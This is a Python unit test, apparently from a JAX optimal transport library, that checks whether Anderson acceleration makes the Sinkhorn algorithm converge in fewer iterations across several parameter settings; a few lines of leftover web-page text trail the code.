# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests Anderson acceleration for sinkhorn."""
from absl.testing import absltest
from absl.testing import parameterized
import jax
import jax.numpy as jnp
import jax.test_util
from ott.core import sinkhorn
from ott.geometry import pointcloud
class SinkhornAndersonTest(jax.test_util.JaxTestCase):
    """Tests for Anderson acceleration."""

    def setUp(self):
        super().setUp()
        # Fixed PRNG seed so every parameterized case sees the same problem.
        self.rng = jax.random.PRNGKey(0)

    @parameterized.product(
        lse_mode=[True, False],
        tau_a=[1.0, .98],
        tau_b=[1.0, .985],
        shape=[(237, 153)],
        refresh_anderson_frequency=[1, 3]
    )
    def test_anderson(self, lse_mode, tau_a,
                      tau_b, shape, refresh_anderson_frequency):
        """Test efficiency of Anderson acceleration.

        Args:
          lse_mode: whether to run in lse (True) or kernel (False) mode.
          tau_a: unbalanced parameter w.r.t. 1st marginal.
          tau_b: unbalanced parameter w.r.t. 2nd marginal.
          shape: shape of test problem.
          refresh_anderson_frequency: how often the Anderson interpolation
            should be recomputed.
        """
        n, m = shape
        dim = 4
        rngs = jax.random.split(self.rng, 9)
        x = jax.random.uniform(rngs[0], (n, dim)) / dim
        y = jax.random.uniform(rngs[1], (m, dim)) / dim + .2
        a = jax.random.uniform(rngs[2], (n,))
        b = jax.random.uniform(rngs[3], (m,))
        # Zero one weight on each side so empty-support entries are exercised.
        a = a.at[0].set(0)
        b = b.at[3].set(0)
        # Make weights roughly sum to 1 if unbalanced, normalize else.
        a = a / (0.5 * n) if tau_a < 1.0 else a / jnp.sum(a)
        b = b / (0.5 * m) if tau_b < 1.0 else b / jnp.sum(b)
        # Here epsilon must be small enough to validate the gain in performance
        # using Anderson by a large enough number of saved iterations,
        # but large enough when lse_mode=False to avoid underflow.
        epsilon = 5e-4 if lse_mode else 5e-3
        threshold = 1e-3
        iterations_anderson = []

        # Run once with acceleration off (memory 0) and once with memory 5;
        # the second run is asserted to converge in fewer iterations.
        anderson_memory = [0, 5]
        for anderson_acceleration in anderson_memory:
            out = sinkhorn.sinkhorn(
                pointcloud.PointCloud(x, y, epsilon=epsilon),
                a=a,
                b=b,
                tau_a=tau_a,
                tau_b=tau_b,
                lse_mode=lse_mode,
                threshold=threshold,
                anderson_acceleration=anderson_acceleration,
                refresh_anderson_frequency=refresh_anderson_frequency)
            errors = out.errors
            # Error slots not reached are marked with -1; drop them.
            clean_errors = errors[errors > -1]
            # Check convergence
            self.assertGreater(threshold, clean_errors[-1])
            # Record number of inner_iterations needed to converge.
            iterations_anderson.append(jnp.size(clean_errors))

        # Check Anderson acceleration speeds up execution when compared to none.
        for i in range(1, len(anderson_memory)):
            self.assertGreater(iterations_anderson[0], iterations_anderson[i])
if __name__ == '__main__':
    # Run under absl's test runner so @parameterized cases are expanded.
    absltest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.